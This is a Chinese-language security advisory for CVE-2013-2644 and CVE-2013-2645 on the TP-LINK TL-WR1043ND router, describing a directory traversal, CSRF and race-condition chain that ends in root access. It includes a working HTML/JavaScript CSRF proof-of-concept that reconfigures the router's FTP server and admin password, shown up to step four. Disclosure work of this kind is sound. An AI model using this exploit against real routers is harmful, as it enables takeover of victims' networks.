发布日期:2013-04-12
更新日期:2013-04-25
受影响系统:
TP-LINK TL-WR1043ND V1_120405
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 59448
CVE(CAN) ID: CVE-2013-2644
TP-LINK TL-WR1043ND是一款无线路由器产品。
TP-LINK TL-WR1043N Firmware TL-WR1043ND_V1_120405内的userRpm/NasFtpCfgRpm.htm没有正确验证输入而存在目录遍历漏洞,攻击者通过构造恶意的'shareFolderName'参数实现目录遍历攻击。
该目录遍历漏洞结合TP-LINK TL-WR1043N的另外一个跨站请求伪造漏洞(CVE-2013-2645)可使得攻击者向TP-LINK上传命令文件并执行。
<*来源:Michail Sajdak
链接:?vuldb.8478
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Michail Sajdak ()提供了如下测试方法:
参考自
前提
In the following proof of concept attack, we assume that a TP-LINK WR1043N device administrator with an active management session established with the router has browsed to a malicious web page. Once there, a series of automatic form submissions take place, one after the other, to the Administrator's router, from the Administrator's browser. Since the Administrator has a current session established with the TP-LINK router, the form submissions are processed.
测试步骤
The malicious page (Figure 1) makes six requests to the WR1043N using HTML img tags. Requests one through four share the /tmp directory over the FTP server, change the password for admin to "ise", make the FTP server Internet-accessible, and start the FTP server, respectively. Request five enables the bandwidth control option of the router; its only purpose is to ensure that request six actually causes the tc.sh file to be rerun. After request five, the attacker (presumably using a script triggered by the victim accessing the attack page) connects to the router's FTP server and continuously uploads a replacement tc.sh file containing malicious commands. Request six disables the bandwidth control option of the router. After receiving request six, due to the race condition: (1) the web interface writes a new copy of tc.sh, (2) the attacker overwrites tc.sh using FTP, and (3) the web interface executes tc.sh.
后果
After obtaining root shell access, an attacker could perform any attack imaginable by compiling and uploading additional commands using the FTP server.
Figure 1
------------------------------------------------------------------------------------
<html>
<head>
<title>TP-LINK TL-WR1043ND CSRF</title>
<!--
# TP-LINK WR1043ND CSRF, Directory Traversal, Race Condition
# Firmware: 3.13.12 Build 120405 Rel.33996n
# Discovered and Exploited By:
# Jacob Holcomb of Independent Security Evaluators
# Re-Implemented and Race Condition Added By:
# Jacob Thompson of Independent Security Evaluators
# CVE: Directory Traversal - CVE-2013-2644, CSRF - CVE-2013-2645
#
#
-->
</head>
<body>
<script type="application/javascript">
// STEP 1 - Share /tmp over the FTP Server
function csrf1() {
document.write('<img src="http://192.168.1.1/userRpm/NasFtpCfgRpm.htm?
displayName=tmp&shareEntire=%2Ftmp%2F.&Save=Save&selPage=0&Page=1&subpage=2
&no_use_para_just_fix_ie_sub_bug=">');
window.setTimeout(csrf2, 1000);
}
// STEP 2 - Change FTP Admin User Password to "ise"
function csrf2() {
document.write('CSRF2...<br>');
document.write('<img src="http://192.168.1.1/userRpm/NaSUSErAdvRpm.htm?
nas_admin_pwd=ise
&nas_admin_confirm_pwd=ise&nas_admin_authority=1&nas_admin_ftp=1&Modify=0
&Save=Save">');
window.setTimeout(csrf3, 1000);
}
// STEP 3 - Enable WAN Access to FTP Server
function csrf3() {
document.write('CSRF3...<br>');
document.write('<img src="http://192.168.1.1/userRpm/NasFtpCfgRpm.htm?internetA=1
&service_port=21&save=Save">');
window.setTimeout(csrf4, 1000);
}
// STEP 4 - Start FTP Server
function csrf4() {
document.write('CSRF4...<br>');
document.write('<img src="https://192.168.1.1/userRpm/NasFtpCfgRpm.htm?startFtp=1"
>');
window.setTimeout(csrf5, 1000);
}